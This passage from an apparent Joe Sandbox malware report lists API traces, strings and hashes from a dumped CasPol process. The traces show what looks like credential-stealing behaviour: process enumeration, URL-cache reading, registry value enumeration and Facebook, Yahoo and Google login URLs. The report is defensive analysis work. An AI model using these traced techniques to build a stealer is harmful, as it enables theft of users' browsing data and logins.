                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3715365532-3916222277
                                                                                                                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                              • memset.MSVCRT ref: 00413D7F
                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                              • memset.MSVCRT ref: 00413E07
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                              • free.MSVCRT ref: 00413EC1
                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                              • API String ID: 1344430650-1740548384
                                                                                                                                                              • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                              • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                              • String ID: bhv
                                                                                                                                                              • API String ID: 4234240956-2689659898
                                                                                                                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                              • API String ID: 2941347001-70141382
                                                                                                                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 644 44671d-446726 641->644 643 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->643 653 4467ac-4467b7 __setusermatherr 643->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 643->654 646 446747-44674b 644->646 647 446728-44672d 644->647 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 652 446755-446758 648->652 650->642 651 44673d-446745 650->651 651->652 652->643 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 665 446834-446838 660->665 666 44683a-44683e 660->666 663 446845-44684b 661->663 664 446872-446877 661->664 669 446853-446864 GetStartupInfoW 663->669 670 44684d-446851 663->670 664->661 665->660 665->666 666->663 668 446840-446842 666->668 668->663 671 446866-44686a 669->671 672 446879-44687b 669->672 670->668 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2827331108-0
                                                                                                                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                              • String ID: visited:
                                                                                                                                                              • API String ID: 1157525455-1702587658
                                                                                                                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                              • free.MSVCRT ref: 0040E28B
                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                              • API String ID: 2804212203-2982631422
                                                                                                                                                              • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                              • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                              • memset.MSVCRT ref: 0040BC75
                                                                                                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 115830560-3916222277
                                                                                                                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                              • free.MSVCRT ref: 0041848B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile$ErrorLastfree
                                                                                                                                                              • String ID: |A
                                                                                                                                                              • API String ID: 77810686-1717621600
                                                                                                                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0041249C
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                              • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                              • String ID: r!A
                                                                                                                                                              • API String ID: 2791114272-628097481
                                                                                                                                                              • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                              • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                              • API String ID: 2936932814-4196376884
                                                                                                                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                              • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                              • String ID: BIN
                                                                                                                                                              • API String ID: 1668488027-1015027815
                                                                                                                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
